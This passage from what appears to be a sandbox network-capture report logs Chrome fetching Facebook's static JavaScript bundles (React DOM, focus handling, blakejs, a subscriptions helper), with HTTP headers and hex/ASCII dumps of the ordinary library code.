                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC1500INData Raw: 61 74 63 68 28 61 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 61 29 7b 61 3d 61 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 3b 76 61 72 20 62 3d 5b 5d 2c 63 3d 64 6f 63 75 6d 65 6e 74 2e 73 63 72 6f 6c 6c 69 6e 67 45 6c 65 6d 65 6e 74 7c 7c 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 77 68 69 6c 65 28 61 26 26 61 21 3d 3d 63 29 7b 76 61 72 20 64 3d 61 2c 65 3d 64 2e 6f 66 66 73 65 74 48 65 69 67 68 74 3b 64 3d 64 2e 6f 66 66 73 65 74 57 69 64 74 68 3b 28 65 3c 61 2e 73 63 72 6f 6c 6c 48 65 69 67 68 74 7c 7c 64 3c 61 2e 73 63 72 6f 6c 6c 57 69 64 74 68 29 26 26 62 2e 70 75 73 68 28 5b 61 2c 61 2e 73 63 72 6f 6c 6c 54 6f 70 2c 61 2e 73 63 72 6f 6c 6c 4c 65 66 74 5d 29 3b 61 3d 61 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 7d 63
                                                                                                                                                                                                                                  Data Ascii: atch(a){}}function m(a){a=a.parentElement;var b=[],c=document.scrollingElement||document.documentElement;while(a&&a!==c){var d=a,e=d.offsetHeight;d=d.offsetWidth;(e<a.scrollHeight||d<a.scrollWidth)&&b.push([a,a.scrollTop,a.scrollLeft]);a=a.parentElement}c
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC470INData Raw: 6c 6c 26 26 61 21 3d 3d 65 26 26 62 26 26 70 28 62 5b 66 2b 31 5d 2c 7b 70 72 65 76 65 6e 74 53 63 72 6f 6c 6c 3a 64 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 71 28 61 2c 62 2c 64 29 7b 61 3d 63 28 22 67 65 74 54 61 62 62 61 62 6c 65 4e 6f 64 65 73 22 29 28 61 2c 62 29 3b 62 3d 61 5b 30 5d 3b 76 61 72 20 65 3d 61 5b 31 5d 2c 66 3d 61 5b 33 5d 3b 61 3d 61 5b 34 5d 3b 61 21 3d 3d 6e 75 6c 6c 26 26 61 21 3d 3d 65 26 26 62 26 26 70 28 62 5b 66 2d 31 5d 2c 7b 70 72 65 76 65 6e 74 53 63 72 6f 6c 6c 3a 64 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 72 28 61 2c 62 2c 64 2c 65 2c 66 29 7b 61 3d 63 28 22 67 65 74 54 61 62 62 61 62 6c 65 4e 6f 64 65 73 22 29 28 61 2c 62 29 3b 62 3d 61 5b 30 5d 3b 76 61 72 20 67 3d 61 5b 31 5d 2c 68 3d 61 5b 32 5d 2c 69 3d 61 5b 33 5d 3b 61 3d 61
                                                                                                                                                                                                                                  Data Ascii: ll&&a!==e&&b&&p(b[f+1],{preventScroll:d})}function q(a,b,d){a=c("getTabbableNodes")(a,b);b=a[0];var e=a[1],f=a[3];a=a[4];a!==null&&a!==e&&b&&p(b[f-1],{preventScroll:d})}function r(a,b,d,e,f){a=c("getTabbableNodes")(a,b);b=a[0];var g=a[1],h=a[2],i=a[3];a=a
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC1500INData Raw: 61 72 20 67 3d 61 5b 31 5d 2c 68 3d 61 5b 32 5d 2c 69 3d 61 5b 33 5d 3b 61 3d 61 5b 34 5d 3b 69 66 28 61 3d 3d 3d 6e 75 6c 6c 7c 7c 62 3d 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 61 3d 3d 3d 67 3f 66 21 3d 6e 75 6c 6c 3f 66 28 29 3a 65 3d 3d 3d 21 30 26 26 28 70 28 68 29 2c 64 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 64 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 29 3a 28 70 28 62 5b 69 2d 31 5d 29 2c 64 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 64 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 29 7d 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 28 61 2e 66 6f 63 75 73 7c 7c 48 54 4d 4c 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6f 63 75 73 29 2e 63 61 6c 6c 28 61 2c 62 29 7d 3b 67 2e
                                                                                                                                                                                                                                  Data Ascii: ar g=a[1],h=a[2],i=a[3];a=a[4];if(a===null||b===null)return;a===g?f!=null?f():e===!0&&(p(h),d.preventDefault(),d.stopPropagation()):(p(b[i-1]),d.preventDefault(),d.stopPropagation())}var t=function(a,b){(a.focus||HTMLElement.prototype.focus).call(a,b)};g.
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC1500INData Raw: 6f 75 74 45 66 66 65 63 74 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 2c 62 29 7b 76 61 72 20 65 3d 28 68 7c 7c 28 68 3d 63 28 22 75 73 65 55 6e 73 61 66 65 52 65 66 5f 44 45 50 52 45 43 41 54 45 44 22 29 29 29 28 6e 75 6c 6c 29 2c 66 3d 65 2e 63 75 72 72 65 6e 74 3b 62 26 26 28 62 2e 70 61 73 73 69 76 65 3d 76 6f 69 64 20 30 29 3b 69 66 28 66 3d 3d 3d 6e 75 6c 6c 29 7b 76 61 72 20 67 3d 64 28 22 52 65 61 63 74 44 4f 4d 22 29 2e 75 6e 73 74 61 62 6c 65 5f 63 72 65 61 74 65 45 76 65 6e 74 48 61 6e 64 6c 65 28 61 2c 62 29 2c 69 3d 6e 65 77 20 4d 61 70 28 29 3b 66 3d 7b 73 65 74 4c 69 73 74 65 6e 65 72 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 69 2e 67 65 74 28 61 29 3b 63 21 3d 3d 76 6f 69 64 20 30 26 26 63 28 29 3b 69 66 28 62 3d 3d 3d 6e
                                                                                                                                                                                                                                  Data Ascii: outEffect;function a(a,b){var e=(h||(h=c("useUnsafeRef_DEPRECATED")))(null),f=e.current;b&&(b.passive=void 0);if(f===null){var g=d("ReactDOM").unstable_createEventHandle(a,b),i=new Map();f={setListener:function(a,b){var c=i.get(a);c!==void 0&&c();if(b===n
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC1500INData Raw: 76 28 61 29 26 26 63 28 21 30 29 7d 65 6c 73 65 20 62 2e 69 73 46 6f 63 75 73 65 64 3f 63 28 62 2e 69 73 46 6f 63 75 73 56 69 73 69 62 6c 65 29 3a 28 72 3d 21 31 2c 63 28 21 31 29 29 7d 66 75 6e 63 74 69 6f 6e 20 79 28 61 2c 62 2c 63 2c 64 29 7b 61 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 73 65 74 4c 69 73 74 65 6e 65 72 28 62 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 78 28 61 2c 63 2c 64 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 28 29 7b 76 61 72 20 61 3d 63 28 22 52 65 61 63 74 55 73 65 45 76 65 6e 74 2e 72 65 61 63 74 22 29 28 22 6d 6f 75 73 65 64 6f 77 6e 22 2c 71 29 2c 62 3d 63 28 22 52 65 61 63 74 55 73 65 45 76 65 6e 74 2e 72 65 61 63 74 22 29 28 64 28 22 52 65 61 63 74 45 76 65 6e 74 48 65 6c 70
                                                                                                                                                                                                                                  Data Ascii: v(a)&&c(!0)}else b.isFocused?c(b.isFocusVisible):(r=!1,c(!1))}function y(a,b,c,d){a.forEach(function(a){a.setListener(b,function(a){return x(a,c,d)})})}function z(){var a=c("ReactUseEvent.react")("mousedown",q),b=c("ReactUseEvent.react")(d("ReactEventHelp
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC1500INData Raw: 2c 66 2c 67 2c 68 2c 69 5d 29 3b 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 3d 61 2e 63 75 72 72 65 6e 74 2c 63 3d 6a 2e 63 75 72 72 65 6e 74 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 61 2e 63 75 72 72 65 6e 74 3d 3d 3d 6e 75 6c 6c 26 26 63 2e 69 73 46 6f 63 75 73 65 64 29 7b 63 2e 69 73 46 6f 63 75 73 65 64 3d 21 31 3b 76 61 72 20 64 3d 6e 65 77 20 77 69 6e 64 6f 77 2e 46 6f 63 75 73 45 76 65 6e 74 28 22 62 6c 75 72 22 29 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 64 2c 22 74 61 72 67 65 74 22 2c 7b 76 61 6c 75 65 3a 62 7d 29 3b 66 26 26 66 28 64 29 3b 68 26 26 68 28 21 31 29 3b 63 2e 69 73 46 6f 63 75 73 56 69 73 69 62 6c 65 26 26 69 26 26 69 28 21 31 29 3b 63 2e 69 73 46 6f 63 75 73 56 69 73
                                                                                                                                                                                                                                  Data Ascii: ,f,g,h,i]);l(function(){var b=a.current,c=j.current;return function(){if(a.current===null&&c.isFocused){c.isFocused=!1;var d=new window.FocusEvent("blur");Object.defineProperty(d,"target",{value:b});f&&f(d);h&&h(!1);c.isFocusVisible&&i&&i(!1);c.isFocusVis
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC910INData Raw: 22 32 31 30 35 39 22 29 26 26 65 3d 3d 3d 21 30 29 72 65 74 75 72 6e 3b 67 26 26 28 67 28 61 29 2c 73 2e 73 65 74 4c 69 73 74 65 6e 65 72 28 64 6f 63 75 6d 65 6e 74 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 26 26 66 28 61 29 2c 73 2e 73 65 74 4c 69 73 74 65 6e 65 72 28 64 6f 63 75 6d 65 6e 74 2c 6e 75 6c 6c 29 7d 29 29 7d 29 29 7d 2c 5b 73 2c 74 2c 70 2c 65 2c 6e 2c 75 2c 61 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6c 5d 29 3b 41 28 29 3b 72 65 74 75 72 6e 20 62 7d 66 75 6e 63 74 69 6f 6e 20 42 28 29 7b 76 61 72 20 61 3d 43 28 22 6d 6f 75 73 65 64 6f 77 6e 22 2c 71 29 2c 62 3d 43 28 64 28 22 52 65 61 63 74 45 76 65 6e 74 48 65 6c 70 65 72 73 22 29 2e 68 61 73 50 6f 69 6e 74 65 72 45 76 65 6e 74 73 3f 22 70 6f 69 6e 74 65 72 64 6f 77 6e 22 3a 22 74 6f 75 63 68 73
                                                                                                                                                                                                                                  Data Ascii: "21059")&&e===!0)return;g&&(g(a),s.setListener(document,function(a){f&&f(a),s.setListener(document,null)}))}))},[s,t,p,e,n,u,a,f,g,h,i,j,l]);A();return b}function B(){var a=C("mousedown",q),b=C(d("ReactEventHelpers").hasPointerEvents?"pointerdown":"touchs


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  77192.168.2.649806157.240.0.64431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC374OUTGET /rsrc.php/v3/yS/r/ui2DkP-wt_7.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC1930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: +0ZQ6CpaMkkPWx1LhVlM1w==
                                                                                                                                                                                                                                  Expires: Fri, 19 Sep 2025 16:40:15 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: 76jQTXgHSFFKi8/ow/kFVwp1e2VpGvqa+e7qbmsMX0YtsbEAIoUsrsq8Eh3/r3ci0Hv1DpphsjjbYQN+2vlJSg==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:23 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=4, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 10849
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC10848INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 2f 2a 2a 0a 20 2a 20 4c 69 63 65 6e 73 65 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 65 67 61 6c 2f 6c 69 63 65 6e 73 65 2f 61 4a 6f 65 53 48 6e 37 58 63 4e 2f 0a 20 2a 2f 0a 5f 5f 64 28 22 62 6c 61 6b 65 6a 73 2d 31 2e 31 2e 30 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 62 3d 7b 7d 3b 76 61 72 20 67 3d 7b 65 78 70 6f 72 74 73 3a 62 7d 3b 66 75 6e 63 74 69 6f 6e 20 68 28 29 7b 76 61 72 20 61 3d 22 49 6e 70 75 74 20 6d 75 73 74 20 62 65 20 61 6e 20 73 74 72 69 6e 67 2c 20 42 75 66 66 65 72 20 6f 72 20 55 69 6e 74 38 41 72 72 61 79 22 3b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 76 61
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*//** * License: https://www.facebook.com/legal/license/aJoeSHn7XcN/ */__d("blakejs-1.1.0",[],(function(a,b,c,d,e,f){"use strict";b={};var g={exports:b};function h(){var a="Input must be an string, Buffer or Uint8Array";function b(b){va


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  78192.168.2.649803157.240.0.64431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC374OUTGET /rsrc.php/v3/yr/r/jJPH6iCu1HH.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC1929INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: UCXVUk0oqmh5pfZQTG8VQA==
                                                                                                                                                                                                                                  Expires: Sun, 21 Sep 2025 06:21:52 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: 4X/gpWLiLyS9ijJJVvx+IbZRQNFPqvjIoXEKmAx0jlVW5B/im7DLEFjId5N+PZfdp0Es2iab+pRJ1ebZKcsrBQ==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:23 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=93, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=2, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 1854
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC1853INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 53 75 62 73 63 72 69 70 74 69 6f 6e 73 48 61 6e 64 6c 65 72 22 2c 5b 22 69 6e 76 61 72 69 61 6e 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 72 65 6d 6f 76 65 7c 7c 61 2e 72 65 73 65 74 7c 7c 61 2e 75 6e 73 75 62 73 63 72 69 62 65 7c 7c 61 2e 63 61 6e 63 65 6c 7c 7c 61 2e 64 69 73 70 6f 73 65 7d 66 75 6e 63 74 69 6f 6e 20 6a 28 61 29 7b 69 28 61 29 2e 63 61 6c 6c 28 61 29 7d 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 74 68 69 73 2e 24 31 3d 5b 5d 7d 76 61 72 20 62 3d 61 2e 70 72 6f 74 6f 74 79 70 65
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("SubscriptionsHandler",["invariant"],(function(a,b,c,d,e,f,g,h){"use strict";function i(a){return a.remove||a.reset||a.unsubscribe||a.cancel||a.dispose}function j(a){i(a).call(a)}a=function(){function a(){this.$1=[]}var b=a.prototype


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  79192.168.2.649805157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC581OUTGET /rsrc.php/v3/y2/r/0uUeXNz0Xos.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC1945INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: 7hrEcOy3n+/PqexLUrqF3A==
                                                                                                                                                                                                                                  Expires: Sat, 27 Sep 2025 02:26:18 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: FfiyRzf3aIZa58UHXo+qFi+aOL8dpUTOWwNYyAFJsDW+1BE81BAxYxiiJgAUTHEDXAZDl+cd2sexlCxhckr4AQ==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:23 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=93, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=3, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 200589
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC15870INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 52 65 61 63 74 46 69 62 65 72 45 72 72 6f 72 44 69 61 6c 6f 67 22 2c 5b 22 63 72 3a 38 39 30 39 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 72 65 74 75 72 6e 20 62 28 22 63 72 3a 38 39 30 39 22 29 2e 73 68 6f 77 45 72 72 6f 72 44 69 61 6c 6f 67 28 61 29 7d 67 2e 73 68 6f 77 45 72 72 6f 72 44 69 61 6c 6f 67 3d 61 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 52 65 61 63 74 44 4f 4d 2d 70 72 6f 64 2e 63 6c 61 73 73 69 63 22 2c 5b 22 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 2c 22 50 72 6f 6d 69 73 65 22 2c 22 52 65 61 63 74 46 65 61 74 75 72 65 46 6c 61 67 73 22 2c 22 52 65 61
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("ReactFiberErrorDialog",["cr:8909"],(function(a,b,c,d,e,f,g){"use strict";function a(a){return b("cr:8909").showErrorDialog(a)}g.showErrorDialog=a}),98);__d("ReactDOM-prod.classic",["EventListener","Promise","ReactFeatureFlags","Rea
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC16384INData Raw: 63 75 6d 65 6e 74 3f 64 6f 63 75 6d 65 6e 74 3a 76 6f 69 64 20 30 29 3b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 3d 74 79 70 65 6f 66 20 64 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 74 72 79 7b 72 65 74 75 72 6e 20 64 2e 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 7c 7c 64 2e 62 6f 64 79 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 64 2e 62 6f 64 79 7d 7d 76 61 72 20 6e 63 3d 2f 5b 5c 6e 5c 22 5c 5c 5d 2f 67 3b 66 75 6e 63 74 69 6f 6e 20 6f 63 28 64 29 7b 72 65 74 75 72 6e 20 64 2e 72 65 70 6c 61 63 65 28 6e 63 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 72 65 74 75 72 6e 22 5c 5c 22 2b 64 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 2b 22 20 22 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 70 63 28 64 2c 65 2c 66 2c 67 2c 68 2c
                                                                                                                                                                                                                                  Data Ascii: cument?document:void 0);if("undefined"===typeof d)return null;try{return d.activeElement||d.body}catch(e){return d.body}}var nc=/[\n\"\\]/g;function oc(d){return d.replace(nc,function(d){return"\\"+d.charCodeAt(0).toString(16)+" "})}function pc(d,e,f,g,h,
